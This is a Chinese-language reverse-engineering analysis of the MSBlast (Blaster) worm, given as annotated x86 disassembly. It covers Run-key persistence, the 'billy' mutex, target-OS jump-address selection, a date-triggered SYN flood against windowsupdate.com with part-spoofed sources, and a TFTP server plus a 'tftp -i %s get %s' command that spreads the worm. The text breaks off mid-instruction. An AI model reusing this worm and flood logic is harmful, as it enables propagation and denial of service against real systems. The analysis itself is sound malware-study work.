在注册表中写入自启动项写入

在注册中写入自启动项写入 ;在注册表中写入自启动项 ?00401250 55 push ebp ?00401251 89e5 mov ebp, esp ?00401253 81ecac030000 sub esp, 000003ac ?00401259 56 push esi ?0040125a 57 push edi ?0040125b 31f6 xor esi, esi ?0040125d 6a00 push 00000000 ?0040125f 8d45f8 lea eax, dword ptr [ebp-08] ?00401262 50 push eax ?00401263 6a00 push 00000000 ?00401265 683f000f00 push 000f003f ?0040126a 6a00 push 00000000 ?0040126c 6a00 push 00000000 ?0040126e 6a00 push 00000000 ?00401270 685d484000 push 0040485d ;db 'software\microsoft\windows\currentversion\run',0 ?00401275 6802000080 push 80000002 ?0040127a e80d110000 call 0040238c ;advapi32.regcreatekeyexa ?0040127f 6a32 push 00000032 ?00401281 683c404000 push 0040403c ;db 'msblast.exe',0 ?00401286 6a01 push 00000001 ?00401288 6a00 push 00000000 ?0040128a 6849484000 push 00404849 ;db 'windows auto update',0 ?0040128f ff75f8 push [ebp-08] ?00401292 e801110000 call 00402398 ;advapi32.regsetvalueexa ?00401297 ff75f8 push [ebp-08] ?0040129a e8e1100000 call 00402380 ;advapi32.regclosekey ;创建互斥体 ?0040129f 6843484000 push 00404843 ;db 'billy',0 ?004012a4 6a01 push 00000001 ?004012a6 6a00 push 00000000 ?004012a8 e8a3100000 call 00402350 ;kernel32.createmutexa …………………… ;选择发送数据的随机数 ?00401476 e8bd0e0000 call 00402338 ;kernel32.gettickcount ?0040147b 50 push eax ;用gettickcount的输出作为srand的随机数种子 ?0040147c e8b30f0000 call 00402434 ;crtdll.srand ?00401481 59 pop ecx ?00401482 e8890f0000 call 00402410 ;crtdll.rand ?00401487 b914000000 mov ecx, 00000014 ?0040148c 99 cdq ?0040148d f7f9 idiv ecx ; ?0040148f 83fa0c cmp edx, 0000000c ?00401492 7d02 jge 00401496 ?00401494 31f6 xor esi, esi ?00401496 c7053431400001000000 mov dword ptr [00403134], 00000001 ?004014a0 e86b0f0000 call 00402410 ;crtdll.rand ?004014a5 b90a000000 mov ecx, 0000000a ?004014aa 99 cdq ?004014ab f7f9 idiv ecx ?004014ad 83fa07 cmp edx, 00000007 ?004014b0 7e0a jle 004014bc ?004014b2 c7053431400002000000 mov dword ptr [00403134], 00000002 …………………… ?00401954 833d3431400001 cmp dword ptr [00403134], 00000001 ;通过比较这个地址 来确定发送针对2000还是xp的攻击代码 ?0040195b 750c jne 00401969 ?0040195d c785eceaffff9d130001 mov dword ptr [ebp+ffffeaec], 0100139d ;使用针 对windows xp的跳转地址 ?00401967 eb0a jmp 00401973 ?00401969 c785eceaffff9f751800 mov dword ptr [ebp+ffffeaec], 0018759f ;使用针 对windows 2000的跳转地址 …………………… ;判断日期 ?004014fc 6a03 push 00000003 ;size of buffer ?004014fe 8d45f4 lea eax, dword ptr [ebp-0c] ?00401501 50 push eax ;buffer ?00401502 683c484000 push 0040483c ;db 'd',0 取日期 ?00401507 6a00 push 00000000 ?00401509 6a00 push 00000000 ?0040150b 6809040000 push 00000409 ;"0409"="en-us;英语 (美国)" ;从getdateformata的locale参数来看，作者使用的操作系统的区域设置是美国。 ?00401510 e8e70d0000 call 004022fc ;kernel32.getdateformata ?00401515 6a03 push 00000003 ?00401517 8d45f0 lea eax, dword ptr [ebp-10] ?0040151a 50 push eax ?0040151b 683a484000 push 0040483a ;db 'm',0 取月份 ?00401520 6a00 push 00000000 ?00401522 6a00 push 00000000 ?00401524 6809040000 push 00000409 ?00401529 e8ce0d0000 call 004022fc ;kernel32.getdateformata ?0040152e 8d45f4 lea eax, dword ptr [ebp-0c] ?00401531 50 push eax ?00401532 e8790e0000 call 004023b0 ;crtdll.atoi ?00401537 59 pop ecx ?00401538 83f80f cmp eax, 0000000f ;比较日期是否大于15日 ?0040153b 7f0f jg 0040154c ;日期大于15日则跳到创建dos线程 ?0040153d 8d7df0 lea edi, dword ptr [ebp-10] ?00401540 57 push edi ?00401541 e86a0e0000 call 004023b0 ;crtdll.atoi ?00401546 59 pop ecx ?00401547 83f808 cmp eax, 00000008 ;比较月份是否大于8月 ?0040154a 7e16 jle 00401562 ;月份大于8月则往下执行创建dos线程 ?0040154c 8d45fc lea eax, dword ptr [ebp-04] ?0040154f 50 push eax ?00401550 6a00 push 00000000 ?00401552 6a00 push 00000000 ?00401554 68c11e4000 push 00401ec1 ;dos子函数 ?00401559 6a00 push 00000000 ?0040155b 6a00 push 00000000 ?0040155d e8120e0000 call 00402374 ;kernel32.createthread …………………… ;处理地址子函数，转换结果保存在eax ?00401e8b 55 push ebp ?00401e8c 89e5 mov ebp, esp ?00401e8e 56 push esi ?00401e8f 57 push edi ?00401e90 ff7508 push [ebp+08] ?00401e93 e8d8020000 call 00402170 ;ws2_32.inet_addr ?00401e98 89c7 mov edi, eax ?00401e9a 31f6 xor esi, esi ?00401e9c 83ffff cmp edi, ffffffff ?00401e9f 751a jne 00401ebb ;如果是ip地址就直接跳过去，如果不是就先解析域名 ?00401ea1 ff7508 push [ebp+08] ?00401ea4 e827030000 call 004021d0 ;ws2_32.gethostbyname ?00401ea9 89c6 mov esi, eax ?00401eab 09f6 or esi, esi ?00401ead 7505 jne 00401eb4 ?00401eaf 83c8ff or eax, ffffffff ?00401eb2 eb09 jmp 00401ebd ?00401eb4 8b460c mov eax, dword ptr [esi+0c] ?00401eb7 8b00 mov eax, dword ptr [eax] ?00401eb9 8b38 mov edi, dword ptr [eax] ?00401ebb 89f8 mov eax, edi ?00401ebd 5f pop edi ?00401ebe 5e pop esi ?00401ebf 5d pop ebp ?00401ec0 c3 ret ;dos子函数 ?00401ec1 55 push ebp ?00401ec2 89e5 mov ebp, esp ?00401ec4 51 push ecx ?00401ec5 53 push ebx ?00401ec6 56 push esi ?00401ec7 57 push edi ?00401ec8 c745fc01000000 mov [ebp-04], 00000001 ?00401ecf 68ec474000 push 004047ec ;db 'windowsupdate.com',0 ?00401ed4 e8b2ffffff call 00401e8b ;处理地址子函数 ?00401ed9 59 pop ecx ?00401eda 89c6 mov esi, eax ;esi保存解析出来的ip ?00401edc 6a01 push 00000001 ?00401ede 6a00 push 00000000 ?00401ee0 6a00 push 00000000 ?00401ee2 68ff000000 push 000000ff ?00401ee7 6a03 push 00000003 ?00401ee9 6a02 push 00000002 ?00401eeb e84c030000 call 0040223c ;ws2_32.wsasocketa ?00401ef0 89c7 mov edi, eax ?00401ef2 83f8ff cmp eax, ffffffff ?00401ef5 7504 jne 00401efb ?00401ef7 31c0 xor eax, eax ?00401ef9 eb34 jmp 00401f2f ?00401efb 6a04 push 00000004 ?00401efd 8d45fc lea eax, dword ptr [ebp-04] ?00401f00 50 push eax ?00401f01 6a02 push 00000002 ?00401f03 6a00 push 00000000 ?00401f05 57 push edi ?00401f06 e8ad020000 call 004021b8 ;ws2_32.setsockopt ?00401f0b 83f8ff cmp eax, ffffffff ?00401f0e 7504 jne 00401f14 ;成功则跳转 ?00401f10 31c0 xor eax, eax ?00401f12 eb1b jmp 00401f2f ?00401f14 57 push edi ?00401f15 56 push esi ?00401f16 e81b000000 call 00401f36 ;syn flood发包函数 ?00401f1b 83c408 add esp, 00000008 ?00401f1e 6a14 push 00000014 ?00401f20 e837040000 call 0040235c ;kernel32.sleep ?00401f25 ebed jmp 00401f14 ?00401f27 57 push edi ?00401f28 e8c7020000 call 004021f4 ;ws2_32.closesocket ?00401f2d 31c0 xor eax, eax ?00401f2f 5f pop edi ?00401f30 5e pop esi ?00401f31 5b pop ebx ?00401f32 c9 leave ?00401f33 c20400 ret 0004 ;syn flood发包函数 ?00401f36 55 push ebp ?00401f37 89e5 mov ebp, esp ?00401f39 81ec9c000000 sub esp, 0000009c ?00401f3f 53 push ebx ?00401f40 56 push esi ?00401f41 57 push edi ?00401f42 8d7d9c lea edi, dword ptr [ebp-64] ?00401f45 8d35b0474000 lea esi, dword ptr [004047b0] ?00401f4b b90f000000 mov ecx, 0000000f ?00401f50 f3 repz ?00401f51 a5 movsd ?00401f52 66c7857effffff5000 mov word ptr [ebp+ffffff7e], 0050 ?00401f5b e8d8030000 call 00402338 ;kernel32.gettickcount ?00401f60 50 push eax ;gettickcount的结果作为srand的随机数种子 ?00401f61 e8ce040000 call 00402434 ;crtdll.srand ?00401f66 e8a5040000 call 00402410 ;crtdll.rand ?00401f6b 898568ffffff mov dword ptr [ebp+ffffff68], eax ?00401f71 e89a040000 call 00402410 ;crtdll.rand ?00401f76 b9ff000000 mov ecx, 000000ff ?00401f7b 99 cdq ?00401f7c f7f9 idiv ecx ?00401f7e 52 push edx ;rand ?00401f7f 8bbd68ffffff mov edi, dword ptr [ebp+ffffff68] ?00401f85 89f8 mov eax, edi ?00401f87 b9ff000000 mov ecx, 000000ff ?00401f8c 99 cdq ?00401f8d f7f9 idiv ecx ?00401f8f 52 push edx ;rand ?00401f90 ff3538314000 push dword ptr [00403138] ;这两个地址保存的是本机ip的 前两字节 ?00401f96 ff3514304000 push dword ptr [00403014] ;synflood的源ip不是完全随机的，前两个字节是真实的，后两字节随机。 ;这可能是考虑到某些网络设备不允许非本网络的ip向外连接 ?00401f9c 682b484000 push 0040482b ;db '%i.%i.%i.%i',0 ?00401fa1 8dbd6effffff lea edi, dword ptr [ebp+ffffff6e] ?00401fa7 57 push edi ;生成的ip ?00401fa8 e87b040000 call 00402428 ;crtdll.sprintf ?00401fad 8d856effffff lea eax, dword ptr [ebp+ffffff6e] ?00401fb3 50 push eax ?00401fb4 e8d2feffff call 00401e8b ;处理地址子函数 ?00401fb9 89c3 mov ebx, eax ;把转换后的ip保存到ebx ;下面开始构造synflood数据包 ?00401fbb 66c745800200 mov [ebp-80], 0002 ?00401fc1 0fb7857effffff movzx eax, word ptr [ebp+ffffff7e] ?00401fc8 50 push eax ;目标端口80 ?00401fc9 e88a010000 call 00402158 ;ws2_32.htons ?00401fce 89c7 mov edi, eax ?00401fd0 66897d82 mov word ptr [ebp-7e], di ?00401fd4 8b4508 mov eax, dword ptr [ebp+08] ?00401fd7 894584 mov dword ptr [ebp-7c], eax ?00401fda c645ec45 mov [ebp-14], 45 ?00401fde 6a28 push 00000028 ?00401fe0 e873010000 call 00402158 ;ws2_32.htons ?00401fe5 89c7 mov edi, eax ?00401fe7 66897dee mov word ptr [ebp-12], di ?00401feb 66c745f00100 mov [ebp-10], 0001 ;ident ?00401ff1 66c745f20000 mov [ebp-0e], 0000 ;fragment offset:0 ?00401ff7 c645f480 mov [ebp-0c], 80 ;ttl:128 ?00401ffb c645f506 mov [ebp-0b], 06 ;protocol:tcp ?00401fff 66c745f60000 mov [ebp-0a], 0000 ?00402005 8b4508 mov eax, dword ptr [ebp+08] ?00402008 8945fc mov dword ptr [ebp-04], eax ?0040200b 0fb7857effffff movzx eax, word ptr [ebp+ffffff7e] ?00402012 50 push eax ?00402013 e840010000 call 00402158 ;ws2_32.htons ?00402018 89c7 mov edi, eax ?0040201a 66897dda mov word ptr [ebp-26], di ?0040201e 8365e000 and dword ptr [ebp-20], 00000000 ?00402022 c645e450 mov [ebp-1c], 50 ?00402026 c645e502 mov [ebp-1b], 02 ?0040202a 6800400000 push 00004000 ;tcp window:16384 ?0040202f e824010000 call 00402158 ;ws2_32.htons ?00402034 89c7 mov edi, eax ?00402036 66897de6 mov word ptr [ebp-1a], di ;[ebp-1a]tcp window:16384 ?0040203a 66c745ea0000 mov [ebp-16], 0000 ?00402040 66c745e80000 mov [ebp-18], 0000 ?00402046 8b45fc mov eax, dword ptr [ebp-04] ?00402049 894594 mov dword ptr [ebp-6c], eax ;[ebp-6c]目标ip ?0040204c c6459800 mov [ebp-68], 00 ?00402050 c6459906 mov [ebp-67], 06 ?00402054 6a14 push 00000014 ?00402056 e8fd000000 call 00402158 ;ws2_32.htons ?0040205b 89c7 mov edi, eax ?0040205d 66897d9a mov word ptr [ebp-66], di ?00402061 895df8 mov dword ptr [ebp-08], ebx ?00402064 e8a7030000 call 00402410 ;crtdll.rand ?00402069 b9e8030000 mov ecx, 000003e8 ?0040206e 99 cdq ?0040206f f7f9 idiv ecx ?00402071 89d7 mov edi, edx ?00402073 81c7e8030000 add edi, 000003e8 ?00402079 81e7ffff0000 and edi, 0000ffff ?0040207f 57 push edi ;随机生成的源端口 ?00402080 e8d3000000 call 00402158 ;ws2_32.htons ?00402085 89c7 mov edi, eax ?00402087 66897dd8 mov word ptr [ebp-28], di ?0040208b e880030000 call 00402410 ;crtdll.rand ?00402090 898564ffffff mov dword ptr [ebp+ffffff64], eax ?00402096 e875030000 call 00402410 ;crtdll.rand ;随机生成seq number ?0040209b 8bbd64ffffff mov edi, dword ptr [ebp+ffffff64] ?004020a1 c1e710 shl edi, 10 ?004020a4 09c7 or edi, eax ?004020a6 81e7ffff0000 and edi, 0000ffff ?004020ac 57 push edi ?004020ad e8a6000000 call 00402158 ;ws2_32.htons ?004020b2 89c7 mov edi, eax ?004020b4 81e7ffff0000 and edi, 0000ffff ?004020ba 897ddc mov dword ptr [ebp-24], edi ?004020bd 895d90 mov dword ptr [ebp-70], ebx ?004020c0 6a0c push 0000000c ?004020c2 8d4590 lea eax, dword ptr [ebp-70] ?004020c5 50 push eax ?004020c6 8d459c lea eax, dword ptr [ebp-64] ?004020c9 50 push eax ?004020ca e81d030000 call 004023ec ;crtdll.memcpy ?004020cf 6a14 push 00000014 ?004020d1 8d45d8 lea eax, dword ptr [ebp-28] ?004020d4 50 push eax ?004020d5 8d45a8 lea eax, dword ptr [ebp-58] ?004020d8 50 push eax ?004020d9 e80e030000 call 004023ec ;crtdll.memcpy ?004020de 6a20 push 00000020 ?004020e0 8d459c lea eax, dword ptr [ebp-64] ?004020e3 50 push eax ?004020e4 e857fdffff call 00401e40 ?004020e9 89c7 mov edi, eax ?004020eb 66897de8 mov word ptr [ebp-18], di ?004020ef 6a14 push 00000014 ?004020f1 8d45ec lea eax, dword ptr [ebp-14] ?004020f4 50 push eax ?004020f5 8d459c lea eax, dword ptr [ebp-64] ?004020f8 50 push eax ?004020f9 e8ee020000 call 004023ec ;crtdll.memcpy ?004020fe 6a14 push 00000014 ?00402100 8d45d8 lea eax, dword ptr [ebp-28] ?00402103 50 push eax ?00402104 8d45b0 lea eax, dword ptr [ebp-50] ;[ebp-50]源端口 ?00402107 50 push eax ?00402108 e8df020000 call 004023ec ;crtdll.memcpy ?0040210d 6a04 push 00000004 ?0040210f 6a00 push 00000000 ?00402111 8d45c4 lea eax, dword ptr [ebp-3c] ?00402114 50 push eax ?00402115 e8de020000 call 004023f8 ;crtdll.memset ?0040211a 6a28 push 00000028 ?0040211c 8d459c lea eax, dword ptr [ebp-64] ?0040211f 50 push eax ?00402120 e81bfdffff call 00401e40 ?00402125 89c7 mov edi, eax ?00402127 66897df6 mov word ptr [ebp-0a], di ?0040212b 6a14 push 00000014 ?0040212d 8d45ec lea eax, dword ptr [ebp-14] ?00402130 50 push eax ?00402131 8d459c lea eax, dword ptr [ebp-64] ?00402134 50 push eax ?00402135 e8b2020000 call 004023ec ;crtdll.memcpy ?0040213a 83c478 add esp, 00000078 ?0040213d 6a10 push 00000010 ?0040213f 8d4580 lea eax, dword ptr [ebp-80] ?00402142 50 push eax ?00402143 6a00 push 00000000 ?00402145 6a28 push 00000028 ?00402147 8d459c lea eax, dword ptr [ebp-64] ?0040214a 50 push eax ?0040214b ff750c push [ebp+0c] ?0040214e e859000000 call 004021ac ;ws2_32.sendto 发包 ?00402153 5f pop edi ?00402154 5e pop esi ?00402155 5b pop ebx ?00402156 c9 leave ?00402157 c3 ret ……………… ;创建tftp服务器函数 ?00401576 55 push ebp ?00401577 89e5 mov ebp, esp ?00401579 81ec2c040000 sub esp, 0000042c ?0040157f 53 push ebx ?00401580 56 push esi ?00401581 57 push edi ?00401582 c7053840400001000000 mov dword ptr [00404038], 00000001 ?0040158c 6a00 push 00000000 ?0040158e 6a02 push 00000002 ;sock_dgram 使用udp ?00401590 6a02 push 00000002 ?00401592 e82d0c0000 call 004021c4 ;ws2_32.socket ?00401597 a324314000 mov dword ptr [00403124], eax ?0040159c 83f8ff cmp eax, ffffffff ?0040159f 0f8445010000 je 004016ea ?004015a5 6a10 push 00000010 ?004015a7 6a00 push 00000000 ?004015a9 8d85d8fdffff lea eax, dword ptr [ebp+fffffdd8] ?004015af 50 push eax ?004015b0 e8430e0000 call 004023f8 ;crtdll.memset ?004015b5 83c40c add esp, 0000000c ?004015b8 66c785d8fdffff0200 mov word ptr [ebp+fffffdd8], 0002 ?004015c1 6a45 push 00000045 ;监听69端口 ?004015c3 e8900b0000 call 00402158 ;ws2_32.htons ?004015c8 89c2 mov edx, eax ?004015ca 668995dafdffff mov word ptr [ebp+fffffdda], dx ?004015d1 83a5dcfdffff00 and dword ptr [ebp+fffffddc], 00000000 ?004015d8 6a10 push 00000010 ?004015da 8d85d8fdffff lea eax, dword ptr [ebp+fffffdd8] ?004015e0 50 push eax ?004015e1 ff3524314000 push dword ptr [00403124] ?004015e7 e8f00b0000 call 004021dc ;ws2_32.bind ?004015ec 09c0 or eax, eax ?004015ee 0f85f6000000 jne 004016ea ?004015f4 c785f8fdffff10000000 mov dword ptr [ebp+fffffdf8], 00000010 ?004015fe 8d85f8fdffff lea eax, dword ptr [ebp+fffffdf8] ?00401604 50 push eax ?00401605 8d85e8fdffff lea eax, dword ptr [ebp+fffffde8] ?0040160b 50 push eax ?0040160c 6a00 push 00000000 ?0040160e 6804020000 push 00000204 ?00401613 8d85d4fbffff lea eax, dword ptr [ebp+fffffbd4] ?00401619 50 push eax ?0040161a ff3524314000 push dword ptr [00403124] ?00401620 e8630b0000 call 00402188 ;ws2_32.recvfrom ?00401625 83f801 cmp eax, 00000001 ;如果请求 ?00401628 0f8cbc000000 jl 004016ea ?0040162e 31db xor ebx, ebx ?00401630 6837484000 push 00404837 ;db 'rb',0 只读、bin模式打开文件 ?00401635 6820304000 push 00403020 ;当前文件绝对路径的偏移 ?0040163a e8950d0000 call 004023d4 ;crtdll.fopen ;这个蠕虫建立tftp的方式和当年的nimda是一样的，不管请求的文件名是什么，都返回 蠕虫文件。 ;所以这个tftp服务器是不会导致系统文件泄露的。和nimda不同的是，只有成功地攻击 了一台机器之后，这个tftp服务器才会运行。 ;所以在感染了msblast.exe的系统上没看到监听udp/69端口是很正常的。 ……………… ;创建tftp服务器线程，发送tftp命令传送文件及运行 ?00401cbd 8d85cce6ffff lea eax, dword ptr [ebp+ffffe6cc] ?00401cc3 50 push eax ?00401cc4 6a00 push 00000000 ?00401cc6 6a00 push 00000000 ?00401cc8 6876154000 push 00401576 ;创建tftp服务器函数 ?00401ccd 6a00 push 00000000 ?00401ccf 6a00 push 00000000 ?00401cd1 e89e060000 call 00402374 ;kernel32.createthread ?00401cd6 8985c0edffff mov dword ptr [ebp+ffffedc0], eax ?00401cdc 6a50 push 00000050 ?00401cde e879060000 call 0040235c ;kernel32.sleep ?00401ce3 683c404000 push 0040403c ;db 'msblast.exe',0 ?00401ce8 6800304000 push 00403000 ; 本机IP ?00401ced 680c484000 push 0040480c ;db 'tftp -i %s get %s',0 ?00401cf2 8d85fcedffff lea eax, dwor